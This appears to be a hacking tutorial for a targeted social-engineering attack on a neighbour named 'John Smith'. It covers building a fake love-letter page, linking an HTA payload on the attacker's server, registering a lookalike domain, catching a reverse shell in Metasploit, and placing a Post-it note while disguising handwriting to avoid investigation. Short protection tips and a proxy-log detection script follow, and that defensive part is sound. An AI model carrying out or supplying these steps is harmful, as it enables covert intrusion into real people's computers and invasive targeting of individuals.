Now that we have our payload hosted on our VPS, as well as Metasploit installed, we can begin developing the webpage which will trick our “John Smith” target into opening our malicious file. Once he has, we can take over his computer.
This part will be more involved, but the first task is to create a website with a page that John will see. Crafting a convincing social engineering page is vital to the success of the attack, and since we know our target well, it shouldn’t be too hard.
Next, we’ll embed the payload we created and hosted on our VPS in the previous guide. We’ll make the payload a downloadable “video” file on the social engineering page. This won’t work at all without a convincing website name, so registering a domain name comes next. We’ll register a website named after our victim (“john-smith.com”) and forward those requests to our social engineering page.
For the final act, we’ll learn when and how to strategically deliver the Post-it note to our victim, get a reverse shell on his computer, and begin working our magic with Metasploit to own everything on his system. This lesson wouldn’t be complete unless we also talked about ways you can prevent yourself from falling victim to such an elaborate attack, so let’s get to it!
Step 1: Create a Website
It’s time now to create the webpage our victim, John Smith, will see when he visits our website. There are numerous ways we can create websites for free. Below are just a few available options.
All of these websites are suitable choices. If you have experience with any of them or similar sites, feel free to use whichever you’re most comfortable with. Tumblr is one of the most popular websites in the world, so there’s a good chance readers have used its services in the past to create websites. It’s also very easy and intuitive to use. For that reason, I’ll be demonstrating how to create a simple website using Tumblr.
To start using Tumblr, head over to their registration page to create an account. Signing up is free and only requires an email address. Be sure to check your email and click the email verification link Tumblr sends you; verifying your email is required to start creating a website.
When that’s done, click on the “Account” button in the top-right corner, then click on the “Settings” button in the drop-down menu.
In the column on the right side, click on the “Untitled” blog to view the blog settings. If there is no “Untitled” blog, simply click on the “Create a new blog” button to create one. From there, click on the “Edit theme” button to customize the look of our website. In the top-left corner, you’ll find the “Edit HTML” button.
The appearance of this website should be extremely personalized to the person you’re targeting. As a generic example for this tutorial, I’ll recreate this random love letter I found online. John Smith will read this letter and believe the person who left the sticky note on his apartment door is confessing their secret love for him. I’ll also sign the love letter as a coworker or friend I was able to identify by viewing John’s social media feeds. John’s best friend is named “Susan Headley.”
I spent a lousy 10 minutes editing the HTML here. In a real scenario, it could be beneficial to spend more time crafting this page in a way that invokes some positive emotion in your victim. We generally don’t want to scare or alarm the person we’re targeting. Putting someone in a cautious or fearful mindset will only make them suspicious of any files we ask them to download and open. This webpage has to be believable enough for our victim to continue reading and ultimately make it to the end of the letter.
Clicking the “video of me” link will produce the video-of-me.hta payload we created in the previous article in this series. How you actually name the file is up to you.
Let’s now take a look at how we link to our HTA payload on the VPS and make it accessible to our victim.
We need to ensure our HTA payload can be easily downloaded by our victim from our social engineering webpage. Below is some simple HTML we’ll use to create a link to resources on other servers.
Using the below HTML, we can create a download link to the HTA payload file being hosted by the Python3 server we set up in the previous guide.
<a href="http://Your-Server-IP-Address/video-of-me.hta">convincing text here</a>
That’s it. Be sure to click “Update Preview” and “Save” in the Tumblr HTML editor.
Step 3: Get a Custom Domain Name (Optional)
It may be possible to use the default Tumblr URL and still have success tricking our victim into visiting “john-smith.tumblr.com.” However, using a Tumblr URL might arouse suspicion in our target and cause our attack to fail. It could be in the best interest of the attack to use a fully unique domain name.
There are many services online that we can use to register custom domains. With Dot.tk, we can create custom domain names for free. Dot.tk only requires an email address to use.
To begin registering a domain name with Dot.tk, simply type your desired domain name into the “Check Availability” bar.
We’ll be presented with several domains that are completely free, including .tk, .ml, and .ga, which might be unfamiliar to some. If you wish to register a .com or a .net, scroll down a bit to view the available premium domains. Paid domains on Dot.tk start at around $4.
When you’ve decided on a domain, click the “Get it now!” button on the right side of the domain you wish to register. Then, click on the “Checkout” button that appears in the top-right corner.
From there, you’ll be redirected to their signup page where you’ll need to enter a valid email address. Dot.tk will send you a verification email with an activation link. Click on the activation link to register your email address. Next, you’ll be redirected to the domain name checkout page. Click the “Forward this domain” button, and enter the URL of the Tumblr page we created in Step 1.
Click on the “Continue” button after entering your Tumblr URL to complete the domain name registration process. That’s it! After a few minutes, visiting “john-smith.tk” in any browser will redirect to the social engineering page we set up earlier.
With your website ready to go, it’s time to start Metasploit. SSH into your VPS and use the below command with the -r argument and the “unicorn.rc” file we created in the previous guide. This will automate the Metasploit msfconsole configuration.
msfconsole -r /path/to/unicorn.rc
Step 4: Deliver the Post-it Note
Finally, it’s time to talk about strategically delivering the Post-it note to our intended victim. The goal is to place the sticky note where your target is most likely to see it. Depending on your building, this may be as simple as stepping out of your apartment in pajamas and placing it at eye level on your neighbor’s apartment door.
If you live in a rural area and can easily be seen approaching your neighbor’s house, you may have to do it at an hour when everyone in your neighborhood is likely away at work or asleep. You might also consider using a reliable piece of tape to keep the Post-it from being blown off your neighbor’s door by a strong gust of wind. Fortunately, if you get caught approaching your neighbor’s house, Post-it notes are small enough to crumple up in your hand without anyone noticing.
In the first part of this series, I mentioned this kind of social engineering trick can be used to target employees in corporate settings. Post-it notes are extremely common and easy to find in office environments. Delivering a Post-it note to your intended victim could be as trivial as placing it on their computer screen, in their mailbox, or directly on their office phone.
Just be careful to obscure your handwriting when creating the Post-it note. If the victim realizes they’re being targeted, an investigation might be opened and it could be possible to correlate the handwriting on the sticky note back to you.
Step 5: Post-Exploitation with Msfconsole
When our victim opens the HTA payload on their computer, the reverse TCP connection will be established back to our VPS, allowing remote access to our victim’s computer. Below is what a newly established connection looks like in msfconsole.
Our simple HTA payload won’t grant you admin privileges, so you’ll have to work a bit to escalate if you want to make significant alterations to the target device. Users new to Metasploit and msfconsole may find our guides on Meterpreter hacking scripts and Meterpreter commands useful.
How to Protect Yourself
There are quite a few unsettling and creepy aspects to this hack. In the first part of this series, we talked about using people search engines and actively monitoring device activity on wireless networks where permission to do so was not explicitly granted to us.
The reality is that anyone who has a $30 computer can do most (if not all) of the steps of this hack. Anyone could be gathering public information about you right now and preparing to social engineer you into visiting a website they control. Instead of shying away from articles like this, let’s better understand how these attacks work so that we can prepare ourselves should we ever become the intended victim.
- If you have an unnecessary number of social media accounts, delete as many of them as possible. There’s a good chance you’re publicly divulging too much about yourself online.
- Don’t over-share personal information when using accounts online. Avoid sharing information about where you live, where you work, and where you are.
- Spoofing hardware MAC addresses when connecting to Wi-Fi networks may help prevent targeted attacks. If your attacker believes you’re using a MacBook and not a Windows computer, any MacBook-specific payloads you’re tricked into opening won’t work in a Windows environment.
- To further prevent outsiders from learning what kinds of devices are used in your home, use Ethernet to access the internet instead of Wi-Fi. Devices connecting to the router via Ethernet cable will not appear in airodump-ng attacks.
- Don’t visit random websites. If you receive a letter, text, email, or any delivery of a strange website and you cannot verify the sender, don’t visit the website.
- Don’t open strange files with unusual file type extensions, especially not from a computer which contains personal or sensitive information.
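On the defensive side, the delivery chain above leaves recognizable traces in a web proxy log: a download with a script-type extension (or an application/hta content type), a link whose host is a bare IP address like the payload URL in the HTML snippet, and a domain on one of the free TLDs named in Step 3. The following Python script is an added example, not code from the original article; the log format and the sample entries are constructed assumptions.

```python
import re
from urllib.parse import urlparse

# Constructed sample proxy-log lines (assumed format, not from the article): timestamp, client IP, method, URL, status, content type.
SAMPLE_LOG = """\
1700000000.101 10.0.0.12 GET http://john-smith.tk/ 200 text/html
1700000000.205 10.0.0.12 GET http://john-smith.tumblr.com/ 200 text/html
1700000000.388 10.0.0.12 GET http://203.0.113.7/video-of-me.hta 200 application/hta
1700000001.002 10.0.0.15 GET https://example.com/report.pdf 200 application/pdf
1700000001.550 10.0.0.15 GET http://cdn.example.org/video-of-me.mp4 200 video/mp4
"""

# Script-type files a browser hands to a script host (an .hta runs under mshta.exe) instead of playing.
SCRIPT_EXTENSIONS = {".hta", ".js", ".jse", ".vbs", ".wsf", ".ps1"}
# TLDs the article notes are free to register, so they are cheap to obtain for a lure domain.
FREE_TLDS = {"tk", "ml", "ga"}
IPV4_HOST = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")

def parse_line(line):
    ts, client, method, url, status, ctype = line.split()
    return {"ts": float(ts), "client": client, "method": method,
            "url": url, "status": int(status), "ctype": ctype}

def assess(entry):
    """Return the reasons this request looks like a scripted-payload download."""
    reasons = []
    u = urlparse(entry["url"])
    host = u.hostname or ""
    name = u.path.rsplit("/", 1)[-1]
    ext = ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""
    if ext in SCRIPT_EXTENSIONS or entry["ctype"] == "application/hta":
        reasons.append("script-type download (%s)" % (ext or entry["ctype"]))
    if IPV4_HOST.match(host):
        reasons.append("host is a bare IP address")
    tld = host.rsplit(".", 1)[-1]
    if tld in FREE_TLDS:
        reasons.append("free-TLD domain (.%s)" % tld)
    return reasons

def scan(log_text):
    """Return (client, url, reasons) for every log line that raises at least one flag."""
    alerts = []
    for line in log_text.splitlines():
        if line.strip():
            entry = parse_line(line)
            reasons = assess(entry)
            if reasons:
                alerts.append((entry["client"], entry["url"], reasons))
    return alerts
```

Running scan(SAMPLE_LOG) flags the .tk lure domain and the .hta download from a bare IP, while the PDF and MP4 requests pass; any one flag alone is weak, so the combination seen from a single client is what merits a look.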
Until next time, you can find me on the darknet.